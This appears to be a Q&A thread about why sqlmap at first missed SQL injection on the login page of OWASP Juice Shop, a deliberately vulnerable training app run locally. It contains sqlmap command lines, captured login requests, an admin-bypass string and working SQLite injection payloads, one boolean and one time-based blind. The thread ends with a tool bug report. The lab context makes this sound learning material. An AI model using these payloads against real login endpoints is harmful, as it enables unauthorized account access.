# Using sqlmap for detecting SQLi on Juice shop's login page

Tags: sql-injection, sqlmap

New Sqlmap user, so please be patient :)

I've started looking at the tool and I'm curious about its use. For instance, the login page of OWASP's Juice shop is vulnerable to sql injection (' OR 1=1-- and you'll be automatically logged in as admin), but running the tool from the cmd line over the login url doesn't detect any vulnerability. Here's the cmd I'm running:

```
sqlmap -r D:\sql_juice.txt  --risk 3 --threads 10 --ignore-code 401 --level 5
```

And here's the request file I've captured with Fiddler:

```
POST http://ws-windows1001:9100/rest/user/login HTTP/1.1
Host: ws-windows1001:9100
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 31
Origin: http://ws-windows1001:9100
Connection: keep-alive
Referer: http://ws-windows1001:9100/
Cookie: language=en; welcomebanner_status=dismiss

{"email":"*","password":"*"}
```

I expected the tool to detect the vulnerability, but it seems like I must be doing something wrong...sould sqlmap detect this scenario?

Thanks.

Comment: May I ask what is in sql_juice.txt file ? If everything is correct there and sqlmap yet does not work you can try to it directly in the command line like this: sqlmap.py -u "http://website.com/juice/login.php" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt"

Comment: sql_juice.txt is the request file that has been captured with fiddler. I can see that sqlmap finds the json body anda asks if it should process it. I've answered yes thinking that it would replace the values with sql injection strings, but the truth is that most of the requests don't even send valid json

Comment: Does sqlmap provides you with some error or it just does not send the data ?

Comment: Don't know why, but now it does find de vulnerability on the parameter....weird stuff....

Answer (score 2, accepted):

First of all always try to minimize usage of **--threads** when you are facing problems and consider testing with something like **--delay=1** as the service might not work normally in high load.

I started Juice with:

```
docker run --rm -p 3000:3000 bkimminich/juice-shop
```

Then when I try to login with invalid creds:

```
POST /rest/user/login HTTP/1.1
Host: 192.168.2.82:3000
Content-Length: 46
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Type: application/json
Origin: http://192.168.2.82:3000
Referer: http://192.168.2.82:3000/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: language=en; welcomebanner_status=dismiss
Connection: close

{"email":"user@example.com","password":"test"}
```

And notice error message from the application:

```
HTTP/1.1 401 Unauthorized
<snip>
Invalid email or password.
```

When I repeat the query with **'** in **email** parameter:

```
{"email":"'","password":"test"}
```

We will observe following response from service:

```
HTTP/1.1 500 Internal Server Error
<snip>
  "error": {
    "message": "SQLITE_ERROR: unrecognized token:
<snip>
```

Then we can start exploiting it with sqlmap. We are using **--dbms=sqlite** to reduce amount of queries and we are ignoring failed logins causing 401 responses. By default sqlmap will stop testing in case of 401 responses.

```
./sqlmap.py -r query.txt --ignore-code=401 --dbms=sqlite
```

Where query.txt content is:

```
{"email":"user@example.com*","password":"test"}
```

Result should look like:

```
$ ./sqlmap.py -r query.txt --ignore-code=401 --dbms=sqlite
<snip>
[04:44:10] [WARNING] (custom) POST parameter '#1*' does not seem to be injectable
[04:44:10] [WARNING] HTTP error codes detected during run:
401 (Unauthorized) - 135 times, 500 (Internal Server Error) - 19 times
```

When we run sqlmap with following command line:

```
 ./sqlmap.py -r query.txt --ignore-code=401 --level=5 --risk=3 --technique=B --dbms=sqlite -t traffic.log
```

We can actually see following in traffic.log:

```
{"email":"user@example.com-5400' OR 3083=3083-- LNfg","password":"test"}
```

With response:

```
{"authentication":{"token":"x","bid":1,"umail":"admin@juice-sh.op"}}
```

But for some reason sqlmap doesn't detect that as a vulnerability. Feels like a bug, but not sure why this happens exactly. Need to investigate more.

If we run following we can find the vulnerability as time-based blind:

```
$ ./sqlmap.py -r query.txt --ignore-code=401 --level=5 --risk=3 --dbms=sqlite -t traffic.log
<snip>
sqlmap identified the following injection point(s) with a total of 694 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: {"email":"user@example.com'||(SELECT CHAR(79,100,67,109) WHERE 8186=8186 AND 9788=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))||'","password":"test"}
---
[05:30:04] [INFO] the back-end DBMS is SQLite
```

**UPDATE:** I submitted this case as an issue to sqlmap GitHub project. See: https://github.com/sqlmapproject/sqlmap/issues/4671

**2nd UPDATE:** This has now been fixed in upstream.